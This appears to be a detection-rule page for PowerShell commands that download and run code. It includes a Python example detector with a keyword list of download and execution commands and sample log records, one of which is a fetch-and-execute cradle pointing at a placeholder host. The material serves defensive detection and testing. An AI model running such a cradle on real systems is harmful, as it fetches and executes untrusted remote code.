
Summary
This detection rule targets PowerShell commands used to download files or data from the internet. It flags potentially malicious activity by matching specific PowerShell commands, such as 'Invoke-Expression' and 'Invoke-WebRequest', together with closely related commands. By focusing on Event Codes 4103 and 4104, the rule captures script execution that may indicate an ongoing attack or a malware download attempt, a technique frequently used by advanced threat actors, including well-known APT groups. The associated threat actors include APT28 (Fancy Bear), APT29, and several others, all of which have a history of using PowerShell in their operations. The detection consumes PowerShell log data and processes the relevant events to raise alerts when suspicious actions are observed, making it a useful component of endpoint protection against script-based exploits and command-and-control activity.
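As an added illustration of the logic the summary describes (example code written for this page, not the rule's own implementation), the Python below runs the detection over a few constructed 4103/4104 records and tags each hit with an ATT&CK technique from the list further down. The field names EventCode, ScriptBlockText and Payload follow the PowerShell Operational log; the alias list (iwr, irm, iex), the .NET download methods and the token-to-technique mapping are my assumptions about what "closely related commands" covers; the sample events and URLs are constructed.

```python
import re
from dataclasses import dataclass

# PowerShell Operational log event IDs the rule keys on: 4103 is module
# logging (pipeline execution details), 4104 is script block logging.
IN_SCOPE_EVENT_CODES = {4103, 4104}

# Cmdlets named in the rule summary, plus the built-in aliases and .NET
# download methods I assume "closely related commands" refers to (assumption,
# not the rule's own list). Keys are lower-case for case-insensitive lookup.
TECHNIQUE_BY_TOKEN = {
    "invoke-webrequest": "T1105",      # Ingress Tool Transfer
    "invoke-restmethod": "T1105",
    "iwr": "T1105",
    "irm": "T1105",
    "downloadstring": "T1105",
    "downloadfile": "T1105",
    "invoke-expression": "T1059.001",  # Command and Scripting Interpreter: PowerShell
    "iex": "T1059.001",
}

# Match any token as a whole word; the (?<![\w-]) / (?![\w-]) guards stop
# "iex" from firing inside unrelated identifiers such as "iexplore".
TOKEN_PATTERN = re.compile(
    r"(?<![\w-])(" + "|".join(re.escape(t) for t in TECHNIQUE_BY_TOKEN) + r")(?![\w-])",
    re.IGNORECASE,
)


@dataclass
class Alert:
    event_code: int
    tokens: list        # matched commands, lower-cased and de-duplicated
    techniques: list    # ATT&CK IDs derived from the matched tokens
    snippet: str        # leading part of the script text, for triage


def script_text(event: dict) -> str:
    """4104 carries the script in ScriptBlockText; 4103 carries the invoked
    command and its bound parameters in Payload."""
    return event.get("ScriptBlockText") or event.get("Payload") or ""


def detect_powershell_downloads(events) -> list:
    """Return one Alert per in-scope event whose script text contains a
    download or expression-evaluation command."""
    alerts = []
    for ev in events:
        if ev.get("EventCode") not in IN_SCOPE_EVENT_CODES:
            continue  # e.g. 4688 process creation is outside this rule's scope
        text = script_text(ev)
        tokens = sorted({m.lower() for m in TOKEN_PATTERN.findall(text)})
        if not tokens:
            continue
        techniques = sorted({TECHNIQUE_BY_TOKEN[t] for t in tokens})
        alerts.append(Alert(ev["EventCode"], tokens, techniques, text[:80]))
    return alerts


# Constructed sample records; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"EventCode": 4104,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"EventCode": 4103,
     "Payload": 'CommandInvocation(Invoke-WebRequest): "Invoke-WebRequest"\n'
                'ParameterBinding(Invoke-WebRequest): name="Uri"; value="http://example.invalid/p.bin"'},
    {"EventCode": 4104,
     "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
    {"EventCode": 4688,
     "CommandLine": "powershell.exe -c Invoke-WebRequest http://example.invalid/x"},
]

if __name__ == "__main__":
    for a in detect_powershell_downloads(SAMPLE_EVENTS):
        print(f"EventCode={a.event_code} tokens={a.tokens} "
              f"techniques={a.techniques} :: {a.snippet}")
```

Run as-is, the first two sample events raise alerts (the 4104 script block hits both the T1059.001 evaluator and the T1105 downloader; the 4103 record hits Invoke-WebRequest only), the benign Get-Process block is ignored, and the 4688 process-creation record is skipped because the rule only consumes 4103 and 4104. Whole-token matching matters in practice: a bare substring check on "iex" would fire on every mention of iexplore.exe.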
Categories
- Endpoint
- Windows
- macOS
- Linux
Data Sources
- Process
- Script
- Application Log
- Network Traffic
ATT&CK Techniques
- T1087.002
- T1135
- T1518
- T1059.001
- T1059
- T1105
Created: 2024-02-09